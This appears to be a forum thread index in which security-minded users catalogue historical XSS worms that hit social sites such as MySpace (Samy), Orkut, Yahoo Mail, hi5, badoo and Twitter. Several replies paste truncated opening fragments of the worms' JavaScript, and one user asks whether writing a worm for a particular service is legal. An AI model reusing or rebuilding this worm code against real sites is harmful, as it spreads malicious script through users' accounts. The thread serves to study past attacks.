List of XSS Worms?
Hi! Do you guys know any other XSS Worms beside this: MySpace.com Sammy's Worm http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy Libero.it, Tiscali.it, Lycos.it, Excite.com Nduja Worm...
View ArticleRe: List of XSS Worms?
A web Named xiaonei had one ! var req = null; var step=null; var DiaryMonthUrlList="",DiaryUrlList=""; var timer=null; var bIsBusy=false; var...
View ArticleRe: List of XSS Worms?
@sirdarckcat, here are a few more. There are more but some of the code has been nuked for various reasons. These are all still intact. U-dominion.com:...
View ArticleRe: List of XSS Worms?
Here is a link to a slightly more advanced version of that first Gaiaonline.com worm. http://www.xssed.com/article/1/Paper_Anatomy_of_a_Pseudo-Reflective_Worm/ The code is still available at the link...
View ArticleRe: List of XSS Worms?
Wow, those worms are really amazing. They are killing those sites reputation.
View ArticleRe: List of XSS Worms?
Here is one of the Yahoo worms. Not sure if this is Yamanner or another one: <div class="msgarea"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif" target>= 0) {...
View ArticleRe: List of XSS Worms?
The Orkut XSS worm code: http://antrix.net/journal/techtalk/orkut_xss.html function $(p,a,c,k,e,d) { e=function(c) {...
View ArticleRe: List of XSS Worms?
Here is the decoded version of the above Orkut worm: I guess Rodrigo Lacerda used the following packer to pack the javascript: http://dean.edwards.name/packer/ ..... then modified it a little bit...
View ArticleRe: List of XSS Worms?
The hi5.com worm: <?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml"> <binding id="xs"> <implementation>...
View ArticleRe: List of XSS Worms?
Does anyone know of the legalities behind worm creation? Specifically the creation, and documentation of, but not necessarily the deployment. I'm looking to write a worm for a specific service and let...
View ArticleRe: List of XSS Worms?
Yeah, but the difference is he would be that he was the one who deployed it. I'm looking only to write one, but not put it to personal use. I'm sure it has to be legal in some manner or another. Look...
View ArticleRe: List of XSS Worms?
Since it appeared on slashdot today... [www.theregister.co.uk] Regarding your question, the article states: "The guidelines establish that to successfully prosecute the author of a tool it needs to be...
View ArticleRe: List of XSS Worms?
Back on topic, we shouldn't forget Samy (for historical reasons if nothing else): <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var...
View ArticleRe: List of XSS Worms?
QuoteI once wrote an xss worm on a forum based on a flaw in a javascript code (it called unescape on info from the user's signature). I had it add it's code as well as a bit of invisible text as a...
View ArticleRe: List of XSS Worms?
Orkut "Crush" Worm // ==UserScript== // @name Master mind // @author "Ishu" // @provided by http:// // @description Ishu // @include *Ishu* // ==/UserScript== function fwScrap() { document.title =...
View ArticleRe: List of XSS Worms?
http://badoo.com var x; b=Math.floor(Math.random()*1000000); if(window.XMLHttpRequest) x = new XMLHttpRequest(); else if(window.ActiveXObject) x = new ActiveXObject("Microsoft.XMLHTTP");...
View ArticleRe: List of XSS Worms?
Trying to keep current with the Twitter worm code: function XHConn() { var xmlhttp, bComplete = false; try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { xmlhttp = new...
View ArticleRe: List of XSS Worms?
Here is the mikeyy XSS worm (thanks to Wayne from Armorize for sending this to me): var genXSS="000; } #notifications{width:...
View Article